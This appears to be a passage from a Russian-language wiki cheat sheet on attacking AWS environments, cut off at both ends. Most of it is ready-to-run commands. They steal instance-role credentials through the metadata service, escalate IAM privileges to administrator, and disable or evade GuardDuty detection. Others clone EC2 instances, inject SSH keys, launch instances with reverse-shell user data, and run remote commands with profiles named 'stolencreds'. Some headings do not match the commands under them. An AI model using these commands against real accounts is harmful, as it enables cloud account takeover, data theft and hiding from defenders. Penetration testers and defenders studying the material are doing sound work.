|ap-northeast-2
|rds.ap-northeast-2.amazonaws.com

rds.ap-northeast-2.api.aws
|-
|ap-southeast-1
|rds.ap-southeast-1.amazonaws.com

rds.ap-southeast-1.api.aws
|-
|ap-southeast-2
|rds.ap-southeast-2.amazonaws.com

rds.ap-southeast-2.api.aws
|-
|ap-northeast-1
|rds.ap-northeast-1.amazonaws.com

rds.ap-northeast-1.api.aws
|-
|ca-central-1
|rds.ca-central-1.amazonaws.com

rds.ca-central-1.api.aws

rds-fips.ca-central-1.api.aws

rds-fips.ca-central-1.amazonaws.com
|-
|eu-central-1
|rds.eu-central-1.amazonaws.com

rds.eu-central-1.api.aws
|-
|eu-west-1
|rds.eu-west-1.amazonaws.com

rds.eu-west-1.api.aws
|-
|eu-west-2
|rds.eu-west-2.amazonaws.com

rds.eu-west-2.api.aws
|-
|eu-south-1
|rds.eu-south-1.amazonaws.com

rds.eu-south-1.api.aws
|-
|eu-west-3
|rds.eu-west-3.amazonaws.com

rds.eu-west-3.api.aws
|-
|eu-north-1
|rds.eu-north-1.amazonaws.com

rds.eu-north-1.api.aws
|-
|me-south-1
|rds.me-south-1.amazonaws.com

rds.me-south-1.api.aws
|-
|sa-east-1
|rds.sa-east-1.amazonaws.com

rds.sa-east-1.api.aws
|-
|us-gov-east-1
|rds.us-gov-east-1.amazonaws.com
|-
|us-gov-west-1
|rds.us-gov-west-1.amazonaws.com
|}

Или только регионы (могут пригодиться при переборе):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
us-east-2
us-east-1
us-west-1
us-west-2
af-south-1
ap-east-1
ap-southeast-3
ap-south-1
ap-northeast-3
ap-northeast-2
ap-southeast-1
ap-southeast-2
ap-northeast-1
ca-central-1
eu-central-1
eu-west-1
eu-west-2
eu-south-1
eu-west-3
eu-north-1
me-south-1
sa-east-1
us-gov-east-1
us-gov-west-1
</syntaxhighlight>

== Доступы ==

== Консольная утилита(awscli) ==

Чаще всего для взаимодействия с сервисами AWS вам потребуется консольная утилита awscli.

Утилита работает с настроенными профилями.

=== Файлы ===

==== ~/.aws/credentials ====

Файл с учетными данными профилей. Перефразирую: получив данные из этого файла вы, вероятнее всего, получите контроль над аккаунтами в нем.

У каждого профиля будет указан:

* Access Key ID - 20 случайных букв/цифр в верхнем регистре, часто начинается с "AKIA..."

* Access Key - 40 случайных символов различного регистра.

* Access Token - не всегда указывается

Полный список параметров можно посмотреть тут: https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-files.html#cli-configure-files-settings

Пример содержимого файла (сохранен профиль default):

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
aws_access_key_id=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws_session_token = AQoEXAMPLEH4aoAH0gNCAPyJxz4BlCFFxWNE1OPTgk5TthT+FvwqnKwRcOIfrRh3c/LTo6UDdyJwOOvEVPvLXCrrrUtdnniCEXAMPLE/IvU1dYUg2RVAJBanLiHb4IgRmpRV3zrkuWJOgQs8IZZaIv2BXIa2R4Olgk
</syntaxhighlight>

==== ~/.aws/config ====

Файл с региональными настройками профиля(регион по-умолчанию).
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
region=us-west-2
output=json
</syntaxhighlight>

==== ~/.aws/cli/cache ====

Закешированные учетные данные

==== ~/.aws/sso/cache ====

Закешированные данные Single-Sign-On

=== Команды ===

Общее построение команды выглядит как:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws <название_сервиса> <действие> <дополнительные_аргументы>
</syntaxhighlight>

Примеры:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Вывести все S3-хранилища.
aws s3 ls

# Создание нового пользователя - сервис IAM
aws iam create-user --user-name aws-admin2
</syntaxhighlight>

== IMDS (Instance Metadata Service) ==

Это http API для запросов из EC2. Полезно если, например, у вас есть уязвимость SSRF в EC2.

Есть 2 версии:

*IMDSv1 - версия 1 по-умолчанию, не требует токен.

*IMDSv2 - версия 2, для запросов требуется токен.

Запрос без токена:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
curl http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Запрос с токеном:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Кроме доп. информации можно получить access-token для доступа в AWS с сервисного аккаунта ec2 (только для IMDSv2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# В начале делаем запрос на директорию /security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Потом выбираем нужный аккаунт и делаем запрос на него
http://169.254.169.254/latest/meta-data/iam/security-credentials/test-account
</syntaxhighlight>

Пример ответа:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Code" : "Success",
"LastUpdated" : "2019-12-03T07:15:34Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "xxxxxxxxxxxxxxxxxxx",
"SecretAccessKey" : "xxxxxxxxxxxxxxxxxxxxx",
"Token" : "xxxxxxxxxxxxxxxxxxxxx",
"Expiration" : "2019-12-03T13:50:22Z"
}
</syntaxhighlight>
После чего эти учетные данные можно использовать с awscli.

Другие полезные Endpoint'ы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://169.254.169.254/
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
</syntaxhighlight>

= Ролевая модель =

Почти все описание доступа идет через ролд. А роли в свою очередь состоят из двух типов политик:

* trust policy - определяет, чья будет роль

* permissions policy - определяет какой доступ будет у тех, у кого эта роль.

Каждая политика состоит из следующих компонентов:

* Ресурс - цель, кому выдается правило. Может быть:
** Пользователь
** Группа, в которой могут быть аккаунты по какому то признаку
** Другая политика.

* Роль(Action) - какое-либо действие (например, iam:ListGroupPolicies - посмотреть список груповых политик)

* Тип правила(Effect) - разрешение или запрет.

* Политика(Policy) - совокупность Роль(действие) -> разрешение/запрет -> Ресурс(кому).

* Условия(Condition) - отдельные условия, например, ip.

Пример политики:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Version": "2012-10-17", //Версия политики
"Statement": [
{
"Sid": "Stmt32894y234276923" //Опционально - уникальный идентификатор
"Effect": "Allow", //Разрешить или запретить
"Action": [ //Разрешенные/Запрещенные действия
"ec2:AttachVolume",
"ec2:DetachVolume"
],
"Resource": [ //На какие ресурсы можно/нельзя совершать действия
"arn:aws:ec2:*:*:volume/*",
"arn:aws:ec2:*:*:instance/*"
],
"Condition": { //Опционально - условия срабатывания
"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
}
}
]
}
</syntaxhighlight>

== Определение ролей ==

=== Вручную ===
TODO команды по определению своих ролей

=== Автоматизированно ===

== Эксплуатация ==

Когда вы определили, какие роли у вас есть, перейдите выше на соответствующий сервис, к которому идет данная роль и прочтите как ее эксплуатировать.

Тут будут отдельные роли, которые не прикреплены ни к одному сервису.

=== Административный доступ ===

Как выглядит роль с административным доступом:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": "*"
}
]
</syntaxhighlight>

= Службы =

== IAM ==

Сервис по обеспечению контроля доступа. Подробнее про ролевую модель можно почитать в соответствующей главе.

=== Роли - повышение привилегий ===

==== iam:UpdateLoginProfile ====

Сбросить пароль у других пользователей:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam update-login-profile --user-name target_user --password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:PassRole + ec2:RunInstance ====

См. EC2

==== iam:PassRole + glue:CreateDevEndpoint ====

См. Glue

==== iam:PutRolePolicy ====

Создать или обновить inline-политику для роли.

==== iam:PutGroupPolicy ====

Создать или обновить inline-политику для группы.

==== iam:PuserUserPolicy ====

Создать или обновить inline-политику.

==== iam:UpdateAssumeRolePolicy + sts:AssumeRole ====

Обновить документ "AssumeRolePolicyDocument" для роли.

=== Роли - повышение до админа ===

==== iam:AddUserToGroup ====

Добавить юзера в административную группу:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name <название_группы> --user-name <логин>
</syntaxhighlight>

==== iam:PutUserPolicy ====

Право добавить своб политику к ранее скомпрометированным обьектам.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam put-user-policy --user-name <логин> --policy-name my_inline_policy --policy-document file://path/to/administrator/policy.json
</syntaxhighlight>

==== iam:CreateLoginProfile ====

Привилегия для создания профиля(с паролем) для аккаунта, выставить новый пароль и перейти под этого пользователя.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam create-login-profile --user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:UpdateLoginProfile ====

Добавить существующую политику к любому пользователю.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachGroupPolicy ====

Добавить существующую политику к любой группе.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachRolePolicy ====

Добавить существующую политику к любой роли.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-role-policy --role-name role_i_can_assume --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:CreatePolicy ====

Создать административную политику.

==== iam:CreatePolicyVersion + iam:SetDefaultPolicyVersion ====

Позволяет поменять политику, выставленную администраторами сети и применить ее, после чего повысить привилегии у обьекта.

Например, если у вас это право, то вы можете создать произвольную политику, дающую полный доступ и применить ее.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание политики
aws iam create-policy-version --policy-arn target_policy_arn --policy-document file://path/to/administrator/policy.json --set-as-default
# Установка политики по умолчанию.
aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2
</syntaxhighlight>

==== iam:PassRole + ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile ====

См. EC2

==== iam:AttachUserPolicy ====

Позволяет прикрепить политику к пользователю. Если существует политика, дающая админские права - повышение.

== AWS Shield ==

Сервис для защиты от DDoS.

== Cognito ==

Позволяет быстро и просто добавлять возможности регистрации, авторизации и контроля доступа пользователей в мобильные и интернет-приложения.

=== Основное ===

Cognito отвечает за следующие действия:

* Регистрация пользователя (email + пароль)

* Авторизация пользователя

* Работа с сохраненной пользовательской информацией (устанавливается приложением)

* Специальные действия (например, предоставление AWS-ключей)

Все общение идет по HTTP(s). Особенность системы в том, что Cognito общается как напрямую с чужим веб-сайтом, так и напрямую с клиентским браузером. То есть веб-сервер не знает, какой был передан пароль (в нормальной реализации).

Пример URL: cognito-identity.us-east-1.amazonaws.com

За действие отвечает HTTP-заголовок "X-Amz-Target". В своем роде, это Endpoints API.

Какие параметры требуются для работы с ним:

1. Название Endpoint'а - "X-Amz-Target" заголовок

2. Регион - "aws_project_region" параметр

3. Session token - позже требуется для запросов.

4. Identity Pool ID - нужен для запросов типа Identity Pools.

Также пишут, что Cognito разделяется на две основные части:

* User Pools - для тех, кому нужна только регистрация и аутентификация

* Identity Pools - для тех, кому еще и нужен доступ к AWS-ресурсам.

=== X-Amz-Target (Endpoints) ===

==== AWSCognitoIdentityService.UpdateUserAttributes ====

У каждого пользователя есть поля, которые могут быть установлены самим пользователем (например, фамилия или дата рождения). Но также это могут быть и критичные поля, такие, как ID пользователя, администратор ли он и так далее.

Также раньше можно было менять поле email'а пользователя (0day): https://infosecwriteups.com/hacking-aws-cognito-misconfiguration-to-zero-click-account-takeover-36a209a0bd8a

Важно! Указано, что могут быть отправки СМС-уведомлений, так что тестировать осторожно.

P.S. Мб неверно название Endpoint'а. Надо проверять.

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Позволяет получить AWS ключи для работы с AWS-консолью. По-умолчанию отключено.

Требуется aws_identity_pool_id.

В некоторых примерах оно также было указано как "com.amazonaws.cognito.identity.model.AWSCognitoIdentityService.GetCredentialsForIdentity"

Подробнее тут: https://blog.appsecco.com/exploiting-weak-configurations-in-amazon-cognito-in-aws-471ce761963

==== AWSCognitoIdentityService.GetOpenIdToken ====

Позволяет получить OpenID токен, действительный на 10 минут.

В примере требуется только "IdentityID"

==== AWSCognitoIdentityService.GetOpenIdTokenForDeveloperIdentity ====

Тоже позволяет получить OpenID токен, действительный на 10 минут. Но также создает новый "IdentityID" (если он не был указан).

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Получить учетные данные пользователя по IdentityID: SecretKey, SessionToken, AccessKeyID.

https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetCredentialsForIdentity.html

== GuardDuty ==

Сервис для детектирования атак используя машинное обучение.

Для детекта использует следующие сервисы:

* CloudTrail
* VPC Flow Logs
* DNS Logs
* ...to be continued

=== Обход защиты ===

Далее идут правила детекта и то, как их можно обойти.

==== UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration ====

Детектит, если AWS-API команды были запущены за пределами EC2 (используя токен этого EC2).

Правило эффективно, если хакер хочет украть токен с EC2 и использовать его вне EC2 (например, если есть только SSRF).

Обход простой: создать свой EC2-инстанс и делать API-запросы с полученными учетными данными жертвы.
Тогда правило не сработает, даже если учетные данные не принадлежат данной EC2 тк правило проверяет source ip и является ли он EC2.

Может быть для этого выгодно держать проксирующий сервер EC2.

==== UserAgent rules ====

Суть в том, что GuardDuty будет добавлять Alert если AWS-CLI использует UserAgent например Kali.
Варианты:

* Использовать утилиту pacu (уже есть смена User-Agent)

* Отредактировать botocore(https://github.com/boto/botocore) по пути /usr/local/lib/python3.7/dist-packages/botocore/session.py: поменять platform.release() на строку юзерагента.

=== Роли - Управление ===

Список ролей: https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonguardduty.html

==== guardduty:UpdateDetector ====

Позволяет выключить GuardDuty (ну или редатировать правила):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty update-detector --detector-id <id of detector> --no-enable
</syntaxhighlight>
==== guardduty:DeleteDetector ====

Удалить правило детектирования:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty delete-detector --detector-id <id of detector>
</syntaxhighlight>

== STS (Security Token Service) ==

Сервис, позволяющий запросить временные учетные данные с ограниченными примилегиями для IAM-пользователей

== KMS (Key Management Service) ==

Сервис для создания криптографических ключей, управления ими и использования их в других сервисах.

Администраторы амазона не смогут получить к ним доступ.

Ключи со временем обновляются:

* Customers keys - раз в 365 дней

* AWS keys - раз в 3 года.

Старые ключи также можно будет использовать для расшифровки.

== CloudHSM (Hardware Security Module) ==

Замена KMS для богатых и тех, кто хочит побольше безопасности. Хранилище ключей, прикрепленное к аппаратному решению.

Пишут, что устройство будет закреплено только за вами.

Также можно получить доступ к CloudHSM-Instance по SSH.

== Athena ==

Интерактивный бессерверный сервис, позволяющий анализировать данные хранилища S3 стандартными средствами SQL.

Умеет работать с шифрованными S3 и сохранять шифрованный вывод.

== EBS (Elastic Block Store) ==

Сервис блочного хранилища (просто жесткий диск, который можно примонтировать).

=== Роли - управление сервисом ===

==== ec2:CreateVolume + ec2:AttachVolume ====

Возможность подключить EBS-Volume/Snapshot к EC2-виртуалке.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание Volume из snapshot'а (если требуется подключить snapshot)
aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone
# Подключение Volume к виртуалке EC2
</syntaxhighlight>

Далее идем на виртуалку и вводим команды:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Поиск Volume
lsblk
# Проверка есть ли на нем данные
sudo file -s /dev/xvdf
# форматировать образ под ext4 (если неподходящая файловая система)
sudo mkfs -t ext4 /dev/xvdf
# Создаем директорию куда примонтируем позже
sudo mkdir /tmp/newvolume
# Монтируем
sudo mount /dev/xvdf /tmp/newvolume/
</syntaxhighlight>

Диск будет доступен на /tmp/newvolume.

== Lambda ==

Сервис для запуска своего кода в облаке.

=== Роли - повышение привилегий ===

==== lambda:UpdateFunctionCode ====

Позволяет поменять запущенный код, тем самым получив контроль над ролями, прикрепленными к этому коду:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws lambda update-function-code --function-name target_function --zip-file fileb://my/lambda/code/zipped.zip
</syntaxhighlight>

==== lambda:CreateFunction + lambda:InvokeFunction + iam:PassRole ====

Позволяет создать функцию и прикрепить к ней произвольную роль, после чего запустить.

Код функции:
<syntaxhighlight lang="python" line="1" enclose="div" style="overflow-x:scroll" >
import boto3
def lambda_handler(event, context):
client = boto3.client('iam')
response = client.attach_user_policy(
UserName='my_username',
PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
)
return response
</syntaxhighlight>

Команды для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание функции
aws lambda create-function --function-name my_function --runtime python3.6 --role arn_of_lambda_role --handler lambda_function.lambda_handler --code file://my/python/code.py
# Запуск
aws lambda invoke --function-name my_function output.txt
</syntaxhighlight>

=== Роли - управление ===

==== lambda:GetFunction ====

Также может понадобиться lambda:ListFunctions чтобы не перебирать названия функций.

Позволяет прочитать исходный код функции (в котором например может быть секрет сохранен):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получить список функций
aws lambda list-functions --profile uploadcreds
# Получить информацию о Lambda-функции
aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds
# Скачать исходный код по ссылке из предыдущего ответа
wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
</syntaxhighlight>

== Glue ==

Бессерверная служба интеграции данных, упрощающая поиск, подготовку и объединение данных для анализа, машинного обучения и разработки приложений.

=== Роли - повышение привилегий ===

==== glue:UpdateDevEndpoint ====

Позволяет обновить параметры Glue Development Endpoint, тем самым получив контроль над ролями, прикрепленными к этому Glue Development Endpoint:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# TODO: это не обновление параметров, надо обновить команду
aws glue --endpoint-name target_endpoint --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

==== glue:CreateDevEndpoint + iam:PassRole ====

Позволяет получить доступ к ролям, которые прикреплены к любому сервису Glue:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws glue create-dev-endpoint --endpoint-name my_dev_endpoint --role-arn arn_of_glue_service_role --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

== S3 ==

Файловое хранилище, доступное по http(s).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{bucket_name}.s3.amazonaws.com
https://s3.amazonaws.com/{bucket_name}/

# US Standard
http://s3.amazonaws.com
# Ireland
http://s3-eu-west-1.amazonaws.com
# Northern California
http://s3-us-west-1.amazonaws.com
# Singapore
http://s3-ap-southeast-1.amazonaws.com
# Tokyo
http://s3-ap-northeast-1.amazonaws.com
</syntaxhighlight>

Делать запросы можно:

* В браузере - http(s)

* Используя awscli:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

В S3 может использоваться шифрование:

* SSE-KMS - Server-Side с ключами KMS

* SSE-C - Server-Side с ключами заказчика

* CSE-KMS - Client-Side с ключами KMS

* CSE-C - Client-Side с ключами заказчика

=== Сбор информации ===

==== Определение региона ====

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
$ dig flaws.cloud
;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.192.11

$ nslookup 52.218.192.11
Non-authoritative answer:
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com

# Итоговый URL будет:
flaws.cloud.s3-website-us-west-2.amazonaws.com
flaws.cloud.s3-us-west-2.amazonaws.com
</syntaxhighlight>
Если будет некорректный регион - редиректнет на корректный.

==== Список файлов ====

На S3-Bukket может быть включен листинг директорий, для этого достаточно перейти в браузере на хранилище и посмотреть возвращенный XML.

Список файлов может быть включен отдельно на определенные директории, поэтому может потребоваться брут директорий используя, например, wfuzz (подстрока AccessDenied).

=== Роли - управление ===

==== s3:ListBucket ====

Посмотреть список файлов в S3-хранилище:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

==== s3:ListAllMyBuckets ====

Посмотреть список всех S3-хранилищ, доступных мне:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3api list-buckets
aws s3 ls
</syntaxhighlight>

== CloudFront ==

Сервис сети доставки контента (CDN).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.cloudfront.net
</syntaxhighlight>

== EC2 (Elastic Compute Cloud) ==

EC2 (Amazon Elastic Compute Cloud) == VPS

Состоит из:

* Instance - название виртуальной машины

* AMI (Amazon Machine Image) - образ виртуальной машины

* SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
ec2-{ip-seperated}.compute-1.amazonaws.com
</syntaxhighlight>

=== SSM Agent ===

Как уже выше написано, SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Его тоже можно выбрать целью атаки

==== MITM ====

Есть возможность вклиниваться в общение от SSM-Агента локально.

PoC: https://github.com/Frichetten/ssm-agent-research/tree/main/ssm-session-interception

Полная статья: https://frichetten.com/blog/ssm-agent-tomfoolery/

=== Роли - повышение привилегий ===

==== ec2:RunInstance + iam:PassRole ====

Позволяет прикрепить существующую роль к скомпрометированной EC2-машине.

1. Запуск машины c новой прикрепленной ролью

2. Подключение к ней

3. Работа с прикрепленной ролью

Создание EC2 с известным SSH-ключем:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --key-name my_ssh_key --security-group-ids sg-123456
</syntaxhighlight>

Второй вариант - скрипт для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --user-data file://script/with/reverse/shell.sh
</syntaxhighlight>

Важно! Может спалиться с GuardDuty когда учетные данные пользователя будут использованы на стороннем инстансе EC2.

=== Роли - повышение до админа ===

==== ec2:AssociateIamInstanceProfile ====

Позволяет менять IAM политики/роли/пользователей

==== ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile + iam:PassRole ====

Позволяет создать новый привилегированный профиль для инстанса и прикрепить его к скомпрометированной EC2-машине.

=== Роли - управление ===

==== ec2:CreateVolume + ec2:AttachVolume ====

См. EBS.

==== ec2:DescribeSnapshots ====

Позволяет посмотреть информацию о SnapShot'ах, которые позже мб потребуется прочитать:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 describe-snapshots --profile flawscloud --owner-id 975426262029 --region us-west-2
</syntaxhighlight>

==== ec2:CreateVolume ====

Прзврояет примаунтить SnapShot, чтобы потом его изучить:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 create-volume --profile YOUR_ACCOUNT --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
</syntaxhighlight>

==== ec2:* (Копирование EC2) ====

Позволяет скопировать EC2 используя AMI-images:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создаем новый AMI из Instance-ID
aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1

# Добавляем наш ключ в систему
aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1

# Создаем EC2-Instance используя созданный AMI (параметры security group и подсеть оставили те же)
aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1

# Проверяем запустился ли инстанс
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1

# Не обязательно - редактируем группу инстанса
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1

# В конце работы - останавливаем и удаляем инстанс
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
</syntaxhighlight>

==== ec2-instance-connect:SendSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds</syntaxhighlight>

==== ec2-instance-connect:SendSerialConsoleSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

В отличие от предыдущего пункта, этот ключ можно использовать только при подключении EC2 Serial Console.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-serial-console-ssh-public-key --instance-id i-001234a4bf70dec41EXAMPLE --serial-port 0 --ssh-public-key file://my_key.pub --region us-east-1

# Подключаемся (кроме GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-east-1.aws
# Подключаемся (только для GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-gov-east-1.amazonaws.com

# В некоторых случаях нужно подключиться к EC2 и перезагрузить сервис getty (лучше пробовать только, когда не смогли подключиться)
sudo systemctl restart serial-getty@ttyS0
# Если не сработало - мб требуется ребутать сервер.
</syntaxhighlight>

Также можно подключиться, используя браузер. Подробнее тут: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/connect-to-serial-console.html

==== ssm:SendCommand ====

Позволяет запускать команды в EC2-Instances. Если нет дополнительных прав, то потребуется:

* Знать Instance-ID, на котором запущен сервис SSM

* Свой сервер, на который будет приходить отстук - результат команды.

Команды для эксплуатации:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию о SSM сервисах - может потребоваться ssm:DescribeInstanceInformation
aws ssm describe-instance-information --profile stolencreds --region eu-west-1
# Выполняем команду
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
# Получаем результат команды(может не хватить прав ssm:ListCommandInvocations)
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds

# Пример - результат команды на удаленный сервер
